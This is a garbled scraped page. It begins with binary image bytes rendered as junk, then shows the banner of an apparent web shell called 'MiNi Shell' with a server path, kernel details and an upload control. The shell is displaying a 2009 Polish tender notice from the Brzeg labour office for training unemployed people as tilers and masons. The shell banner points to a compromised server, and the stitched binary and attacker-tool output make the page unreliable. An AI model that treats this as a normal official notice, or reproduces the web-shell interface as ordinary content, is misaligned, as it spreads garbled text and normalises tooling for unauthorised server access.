JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090408/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090408/97906-N-2009.html

<p class="kh_header"><b>Brzeg: Przetarg  nieograniczony na organizację i przeprowadzenie szkolenia zawodowego osób bezrobotnych w zakresie:
Zadanie nr 1 Glazurnik-posadzkarz - 15 osób.
Zadanie nr 2 Murarz-odgrzybiacz - 15 osób.</b><br>
<b>Numer ogłoszenia: 97906 - 2009; data zamieszczenia: 08.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Brzegu , ul. Armii Krajowej 32, 49-300 Brzeg, woj. opolskie, tel. 077 4441390 do 2, faks 077 4441390 do 2.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.brzeg.sisco.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg  nieograniczony na organizację i przeprowadzenie szkolenia zawodowego osób bezrobotnych w zakresie:
Zadanie nr 1 Glazurnik-posadzkarz - 15 osób.
Zadanie nr 2 Murarz-odgrzybiacz - 15 osób..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi szkoleniowe dla osób bezrobotnych zarejestrowanych w   Powiatowym Urzędzie Pracy w Brzegu - w zakresie: ,,Glazurnik  posadzkarz oraz ,, Murarz odgrzybiacz.
  Szkoleniem zostanie objętych 30 osób bezrobotnych w dwóch 15- osobowych grupach. W ramach Zadania nr I Glazurnik  posadzkarz 15 osób, i w ramach Zadania nr 2 Murarz  odgrzybiacz również 15 osób. 
Zamawiający nie dopuszcza składania ofert częściowych.
Zadanie nr 1 i Zadanie nr 2 będzie realizowane w dwóch odrębnych grupach. 

Zadanie nr 1. Glazurnik  posadzkarz
Przedmiotem zamówienia jest teoretyczne i praktyczne przygotowanie uczestników szkolenia do wykonywania pracy w zakresie wykonywania zawodu glazurnik/posadzkarz. Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w  Powiatowym Urzędzie Pracy w Brzegu, które posiadają wykształcenie minimum podstawowe. Szkolenie przygotowuje do pracy w wyżej wymienionym zakresie: roboty glazurnicze i posadzkarskie.
Absolwenci kursu będą mogli wykonywać podłogi i posadzki z różnych dostępnych materiałów, przy zastosowaniu odpowiednich narzędzi i sprzętu do obróbki materiałów posadzkarskich oraz okładziny ścian płytkami ceramicznymi lub podobnymi, zgodnie z dokumentacją i przyjętą technologią.

Program szkolenia   powinien wykorzystywać standardy kwalifikacji  zawodowych i modułowy program szkolenia. Dla zawodu Glazurnik  posadzkarz, dostępny w bazie danych Ministerstwa Pracy i polityki Społecznej www.standardyiszkolenia.praca.gov.pl

Program szkolenia powinien zawierać w szczególności: 
1)	nazwę i zakres szkolenia,
2)	czas trwania i sposób organizacji szkolenia,
3)	wymagania wstępne dla uczestników szkolenia,
4)	cele szkolenia,
5)	plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i praktycznej,
6)	wykaz treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
7)	wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
8)	sposób sprawdzania efektów szkolenia.

Szkolenie winno obejmować co najmniej następujące zagadnienia:
- posługiwanie się dokumentacją techniczną,
- wykonywanie rysunków roboczych i drobnych aranżacji, 
- organizowanie miejsca pracy i dróg transportowych materiałów,
 - wykonywanie podkładów pod różne rodzaje posadzek oraz izolacji akustycznych i  
    przeciwwodnych podłóg,
- przygotowanie zapraw cementowych, klejów, kitów, lepików, mas plastycznych itp.,     
  sposobem ręcznym i mechanicznym, dobieranie, sortowanie i obróbka wstępna materiałów  
  podłogowych i posadzkowych,
- układanie posadzek z różnych materiałów, zgodnie z przyjęta technologia i warunkami  technicznymi wykonania robót,
- układanie i mocowanie elementów wykończeniowych posadzek,
- wykańczanie i konserwacja nawierzchni podłogi,
-	naprawianie i konserwowanie istniejących posadzek z różnych materiałów,
-	dobieranie, sprzętu , maszyn i narzędzi, zgodnie z zasadami bhp oraz przepisami przeciwpożarowymi, warunkami technicznymi oraz zasadami racjonalnej gospodarki materiałami i ochrony środowiska, 
-	przygotowanie lica ścian (podłoża)  pod ułożenie glazury,
-	zaplanowanie okładziny-sortowanie i rozmieszczenie, dobór elementów wykończeniowych i ozdobnych,
-	obróbka płytek-przycinanie, szlifowanie, wykonywanie otworów,
-	przyklejanie płytek na zaprawie cementowej i klejowej,
-	spoinowanie,
-	licowanie cokołów, schodów, podokienników, słupów itp., płytkami i kształtkami ceramicznymi lub klinkierowymi,
-	naprawianie okładzin ściennych z różnych rodzajów płytek i na różnych podłożach.

Każdy uczestnik szkolenia powinien w ramach zajęć praktycznych dla Zadania nr1:
1. położyć płytki typu: podłogowe gres techniczny, format 30cmx30cm, maksimum 50cmx50cm, klasa ścieralności minimum 4, grubość: minimum 0,80 cm, kolory jasne oraz położyć 8m2 płytek zgodnie ze sztuką budowlaną.
2. położyć płytki typu: ścienne glazura, format minimum 20cmx20cm, maksimum 40cmx40cm, grubość minimum 0,80 cm, kolory: jasne oraz położyć 8m2 tego typu glazury zgodnie ze sztuką budowlaną.

Sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników szkolenia.
Wyposażenie bazy szkoleniowej powinno umożliwić każdemu uczestnikowi szkolenia poznanie i przyuczenie do pracy wraz z umiejętnościami będącymi przedmiotem szkolenia.
Jeżeli uczestnik przerwie szkolenie Zamawiający może skierować na zwolnione miejsce nową osobę bezrobotną, która zobowiązana jest realizować obowiązki uczestnika szkolenia na zasadach określonych niniejszą umową. Wykonawca zobowiązany jest przeszkolić te osoby z  wcześniej przerobionego  materiału. Zamawiający pokryje jedynie koszt odpowiadający kosztowi kursu przewidzianego dla jednej osoby.
Wykonawca zapewni w trakcie szkolenia warunki pracy zgodne z przepisami BHP i ppoż., w tym także odpowiednią odzież roboczą, rękawice,  kombinezon, obuwie itp.) oraz komplet narzędzi potrzebnych do nauki zawodu oraz zapewni materiały szkoleniowe (zbindowany skrypt lub książkę, materiały kancelaryjne, środki dydaktyczne, zeszyt, długopis oraz inne materiały zgodne z preliminarzem kosztów (wg załącznika nr 3 , 3a i 3b załączonego do oferty).
Wykonawca zapewnia zimne i gorące napoje oraz poczęstunek (kanapki) dla osób zamieszkałych poza miejscem szkolenia.
Zleceniodawca zapewnia lokalizację miejsca praktycznego szkolenia i ilość pomieszczeń do realizacji części praktycznej.
Wykonawca zapewnia realizację zajęć praktycznych z zawodu podczas trwania szkolenia.
Wykonawca zapewnia materiały budowlane niezbędne do wykonania zadania. Koszty związane z ubytkami  wskutek braku doświadczenia przez uczestników szkolenia(zniszczony materiał) ponosi wykonawca.
Zajęcia teoretyczne powinny być prowadzone w salach dydaktycznych wyposażonych w odpowiednie oprzyrządowanie techniczne, w tym:
-aparaturę audiowizualną;
-kserokopiarkę;
-rzutnik pisma;
-tablica flipchart, tablica naścienna lub tablica informacyjna (foliowo-magnetyczna);
-biurka i krzesła.
Zajęcia teoretyczne dla każdej z grup winny odbywać się oddzielnie.

Badania lekarskie
Zamawiający wymaga przedstawienia przez wykonawcę wymagań wstępnych dla uczestników szkolenia w tym określenia stanu zdrowia uczestnika szkolenia.
W razie konieczności przeprowadzenie badań lekarskich organizuje zamawiający.
Zamawiający ponosi koszty badań lekarskich.

Liczba uczestników szkolenia 15 osób bezrobotnych.
Wymagana ilość godzin przypadających na jednego uczestnika szkolenia: nie mniej niż 240 godzin w tym:
Zajęcia teoretyczne minimum 50 godzin zegarowych,
Zajęcia praktyczne minimum 190 godzin zegarowych.
Szkolenie odbywać się ma codziennie, w dni robocze od poniedziałku do piątku pomiędzy godzinami 8:00-15:00.
Szkolenie winno być realizowane według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu.
Godzina oznacza godzinę zegarową tj. 60 minut.
Okres realizacji szkolenia dla Zadania nr 1 wynosi 8 pełnych tygodni.

Miejsce przeprowadzenia szkolenia 
Zamawiający wymaga aby zajęcia teoretyczne oraz praktyczne prowadzone były na terenie miasta Brzeg.
Nie dopuszcza się możliwości powierzenia  wykonania części zamówienia  podwykonawcy.
Wykonawca powinien sprawować nadzór wewnętrzny służący podnoszeniu jakości szkolenia

Wymagania dotyczące zaświadczeń o ukończeniu szkolenia
Szkolenie powinno zakończyć się oceną opanowania wiedzy i nabytych umiejętności w formie egzaminu teoretycznego i praktycznego.
Uczestnicy szkolenia po jego zakończeniu otrzymają zaświadczenie o ukończeniu szkolenia zgodnie z § 6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (DZ.U. Nr 31, poz.216). Wzór zaświadczenia należy dołączyć do oferty.

Wymagania dotyczące kadry

Wykładowcy przewidziani do prowadzenia zajęć teoretycznych muszą posiadać wykształcenie wyższe magisterskie z uprawnieniami pedagogicznymi do nauczania przedmiotów zawodowych lub z wykształceniem inżynierskim z uprawnieniami pedagogicznymi do wykładów przedmiotów zawodowych.
Zajęcia praktyczne powinny być prowadzone przez instruktora, który posiada wykształcenie co najmniej  średnie techniczne z przygotowaniem pedagogicznym dla instruktorów praktycznej nauki  zawodu.
Zajęcia praktyczne w ramach danej grupy winny być prowadzone przez dwóch instruktorów (na jednego instruktora nie może przypadać więcej niż 8 uczestników szkolenia).
Nadzór nad całością winien sprawować inspektor budowlany z wykształceniem wyższym budowlanym lub średnim budowlanym, z aktualnymi uprawnieniami budowlanymi.

Zadanie nr 2  Murarz odgrzybiacz
Przedmiotem zamówienia jest teoretyczne i praktyczne przygotowanie uczestników szkolenia do wykonywania prac murarskich i odgrzybiarskich w budownictwie. Szkolenie jest skierowane do osób bezrobotnych zarejestrowanych w powiatowym Urzędzie Pracy w Brzegu, które posiadają wykształcenie co najmniej podstawowe, ukończyli 18 rok życia i posiadają odpowiedni stan zdrowia.

Szkolenie powinno być oparte o metody wykorzystujące przede wszystkim praktykę w celu aktywnego uczestnictwa osób szkolonych. Sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników szkolenia.

Program szkolenia powinien wykorzystywać standardy kwalifikacji zawodowych i modułowy program szkolenia zawodowego dla zawodu  murarza odgrzybiacza, dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www. standardyiszkolenia.praca.gov.pl w zakresie pracy (wykonywanie murowania różnych elementów budynków).
Program szkolenia teoretycznego powinien zawierać minimum tematykę z zakresu: 
-	rysunku technicznego dla murarzy
-	technologii i materiałoznawstwa.
- przepisów bezpieczeństwa i higieny pracy przy robotach murarsko odgrzybieniowych.

Program szkolenia praktycznego powinien gwarantować m. in.: odpowiedni zakres robót dla specjalności murarz -  odgrzybiacz w celu nabycia praktyki i umiejętności do wykonywania różnego rodzaju prac murarskich i odgrzybieniowych.

W wyniku realizacji szkolenia absolwent powinien potrafić wykonywać zadania murarza odgrzybiacza obejmującego m. in. :
-    ocenianie przydatności i posługiwanie się narzędziami i sprzętem murarskim i  
     odgrzybieniowym,
-	ocenianie przydatności materiałów budowlanych i odgrzybieniowych do wykonywania robót murasko odgrzybieniowych,
-	czytanie rysunków roboczych i wykonywanie obmiarów robót,
-	wykonywanie ścian działowych,
-	wykonywanie rozbiórki konstrukcji murowych,
-	przygotowanie zapraw murarskich,
-	wznoszenie ścian, sklepień, układanie stropów,
-	wykonanie izolacji,
-	rodzaje tynków i podłoży, tynkowanie ręczne i mechaniczne,
-	organizacja robót murarskich, tynkarskich i regipsowych,
-	wykonywanie prac remontowych i konserwatorskich (naprawianie i uzupełnianie ubytków murarskich i tynkarskich),
-	przepisy bhp, ppoż i ochrony środowiska (składowanie odpadów).

W zakresie robót izolacyjno - odgrzybieniowych impregnacyjnych każdy uczestnik szkolenia winien zapoznać się z następującą tematyką :
- wykonanie izolacji przeciwwodnej poziomej z asfaltu lanego jednowarstwowa   dwuwarstwowa,
- wykonanie izolacji jednowarstwowej lepikiem asfaltowym murów otynkowanych,
odgrzybianie powierzchni murów z cegły, łatwo dostępnych przy użyciu szczotek stalowych,
- odgrzybianie stropów,
- odgrzybianie ścian  ceglanych metodą opryskiwania środkami chemicznymi. 
Każdy uczestnik szkolenia powinien w ramach zajęć praktycznych dla Zadania nr2:
1.	Przygotować podłoże(naprawa ubytków murarskich, osuszenie podłoża, zastosowanie preparatów grzybobójczych, dobór odpowiedniej izolacji przeciwwilgociowych) pod położenie płytek podłogowych.
2.	Przygotować ściany (osuszenie, zastosowanie preparatów grzybobójczych, odpowiedni dobór izolacji przeciwwilgociowych) pod położenie płytek na ścianach.
Ponadto położyć 8 m2 gładzi na ścianach i sufitach z umiejętnością przygotowania pod malowanie oraz zamalować położoną gładź farbą akrylową białą wewnętrzną zgodnie ze sztuką budowlaną.
 
Sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników szkolenia.
Wyposażenie bazy szkoleniowej powinno umożliwić każdemu uczestnikowi szkolenia poznanie i przyuczenie do pracy wraz z umiejętnościami będącymi przedmiotem szkolenia.
Jeżeli uczestnik przerwie szkolenie Zamawiający może skierować na zwolnione miejsce nową osobę, która zobowiązana jest realizować obowiązki uczestnika szkolenia na zasadach określonych niniejszą umową. Wykonawca zobowiązany jest przeszkolić  osobę z przerobionego wcześniej materiału. W takim przypadku Zamawiający pokryje jedynie koszt odpowiadający kosztowi kursu przewidzianego dla jednej osoby.
Wykonawca zapewni w trakcie szkolenia warunki pracy zgodne z przepisami BHP i ppoż., w tym także odpowiednią odzież roboczą, rękawice,  kombinezon, obuwie itp.) i komplet narzędzi potrzebnych do nauki zawodu oraz zapewni materiały szkoleniowe (zbindowany skrypt  lub książkę, materiały kancelaryjne, środki dydaktyczne, zeszyt długopis oraz inne materiały zgodne z preliminarzem kosztów wg załącznika nr 3, 3a i 3b.
Wykonawca zapewnia zimne i gorące napoje oraz poczęstunek (kanapki) dla osób zamieszkałych poza miejscem szkolenia.
Zleceniodawca zapewnia lokalizację miejsca praktycznego szkolenia i ilość pomieszczeń do realizacji części praktycznej.
Wykonawca zapewnia realizację zajęć praktycznych z zawodu podczas trwania szkolenia.
Wykonawca zapewnia materiały budowlane niezbędne do wykonania zadania. Koszty związane z ubytkami (zniszczony materiał) ponosi wykonawca.
Zajęcia teoretyczne powinny być prowadzone w salach dydaktycznych wyposażonych w odpowiednie oprzyrządowanie techniczne, w tym:
 - aparaturę audiowizualną;
 - kserokopiarkę;
 - rzutnik pisma;
 - tablica flipchart, tablica naścienna lub tablica informacyjna (foliowo-magnetyczna);
   biurka i krzesła.
Zajęcia teoretyczne dla każdej z grup winny odbywać się oddzielnie.



Badania lekarskie
Zamawiający wymaga przedstawienia przez wykonawcę wymagań wstępnych dla uczestników szkolenia w tym określenia stanu zdrowia uczestnika szkolenia.
W razie konieczności przeprowadzenie badań lekarskich organizuje zamawiający.
Zamawiający ponosi koszty badań lekarskich.

Liczba uczestników szkolenia 15 osób bezrobotnych.

Wymagana ilość godzin przypadających na jednego uczestnika szkolenia: nie mniej niż 240 godzin w tym:
Zajęcia teoretyczne minimum 50 godzin zegarowych,
Zajęcia praktyczne minimum 190 godzin zegarowych.
Szkolenie odbywać się ma codziennie, w dni robocze od poniedziałku do piątku pomiędzy godzinami 8:00-15:00.
Szkolenie winno być realizowane według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu.
Godzinna oznacza godzinę zegarową tj. 60 minut.
Okres realizacji szkolenia dla Zadania nr 2 wynosi 8 pełnych tygodni.

Miejsce przeprowadzenia szkolenia 
Zamawiający wymaga aby zajęcia teoretyczne oraz praktyczne prowadzone były na terenie miasta Brzeg.

Nie dopuszcza się możliwości powierzenia  wykonania części zamówienia  podwykonawcy.
Wykonawca powinien sprawować nadzór wewnętrzny służący podnoszeniu jakości szkolenia

Wymagania dotyczące zaświadczeń o ukończeniu szkolenia
Szkolenie powinno zakończyć się oceną opanowania wiedzy i nabytych umiejętności w formie egzaminu teoretycznego i praktycznego.
Uczestnicy szkolenia po jego zakończeniu otrzymają zaświadczenie o ukończeniu szkolenia zgodnie z § 6 Rozporządzenia Ministra edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (DZ.U. Nr 31, poz.216). Wzór zaświadczenia należy dołączyć do oferty.

Wymagania dotyczące kadry

Wykładowcy przewidziani do prowadzenia zajęć teoretycznych muszą posiadać wykształcenie wyższe magisterskie z uprawnieniami pedagogicznymi do nauczania przedmiotów zawodowych lub z wykształceniem inżynierskim z uprawnieniami pedagogicznymi do wykładów przedmiotów zawodowych.
Zajęcia praktyczne powinny być prowadzone przez instruktora, który posiada wykształcenie co najmniej  średnie techniczne z przygotowaniem pedagogicznym dla instruktorów praktycznej nauki  zawodu.
Zajęcia praktyczne w ramach danej grupy winny być prowadzone przez dwóch instruktorów (na jednego instruktora nie może przypadać więcej niż 8 uczestników szkolenia).
Nadzór nad całością winien sprawować inspektor budowlany z wykształceniem wyższym budowlanym lub średnim budowlanym, z aktualnymi uprawnieniami budowlanymi..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy potwierdzający spełnienie warunków:
1. Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek takich uprawnień.
2. Posiadający wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia technicznego i osób zdolnych do wykonywania zamówienia.
3. Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4 .Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.

Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców, którzy: 
1.Nie spełniają warunków w postępowaniu o zamówienie publiczne z art. 22 Prawa   
       zamówień publicznych opisanych w  ppkt. 1.1 do1.4.
2. Podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.  
3. Wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego  
 postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu czynności chyba, że udział tych Wykonawców w postępowaniu nie utrudni  uczciwej konkurencji.
4. Złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania.
5. Nie złożyli oświadczenia o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożone dokumenty zawierają błędy  z zastrzeżeniem art. 26 ust.3 Prawa zamówień publicznych.
6. Nie zgodzili się na przedłużenie okresu związania ofertą .

Zamawiający odrzuca ofertę jeżeli:
1. Jest niezgodna z ustawą.   
2. Jej treść nie odpowiada treści Specyfikacji Istotnych Warunków Zamówienia z   
      zastrzeżeniem art.87 ust. 2 pkt.  Prawa zamówień publicznych.
3. Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji.
4.Zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia. 
5.Została złożona przez Wykonawcę wykluczonego z  udziału w postępowaniu o udzielenie zamówienia.       
6.Zawiera błędy w obliczeniu ceny.
7.Wykonawca w terminie 3 dni od dnia otrzymania zawiadomienia nie zgodził się na  
   poprawione omyłki rachunkowe w obliczeniu ceny.
8. Jest nieważna na podstawie odrębnych przepisów.     
  
Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku  
granicznego - spełnia nie spełnia.

Oferty Wykonawców spełniające powyższe warunki zostaną poddane ocenie zgodnie z kryteriami zawartymi w niniejszej SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawa zamówień publicznych, zwanej dalej ustawą Wykonawca składa następujące dokumenty:       
1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego Oddziału Zakładu  Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.      
3. Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
4. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu z art. 22 ustawy Prawo zamówień publicznych  ( wzór zał. nr 1 do oferty).
5. Oświadczenie o nie podleganiu z wykluczenia na podstawie art.24 ust.1 i 2 ustawy z dnia 29 stycznia 2004r Prawo zamówień publicznych (wzór zał. nr 2 do oferty).
6. Aktualne zaświadczenie o wpisie instytucji szkoleniowej do Rejestru Instytucji Szkoleniowych Wojewódzkiego Urzędu Pracy właściwego ze względu na siedzibę instytucji szkoleniowej.


W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 
1.Wykaz niezbędnych urządzeń, narzędzi, jakimi dysponuje Wykonawca (wg wzoru określonego w załączniku nr 4). 
2.Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności(wg załączonego wzoru określonego w załączniku nr.5).
Wymagane jest załączenie dokumentów potwierdzających posiadanie uprawnień, wykształcenia, kwalifikacji w zakresie realizacji przedmiotu zamówienia.
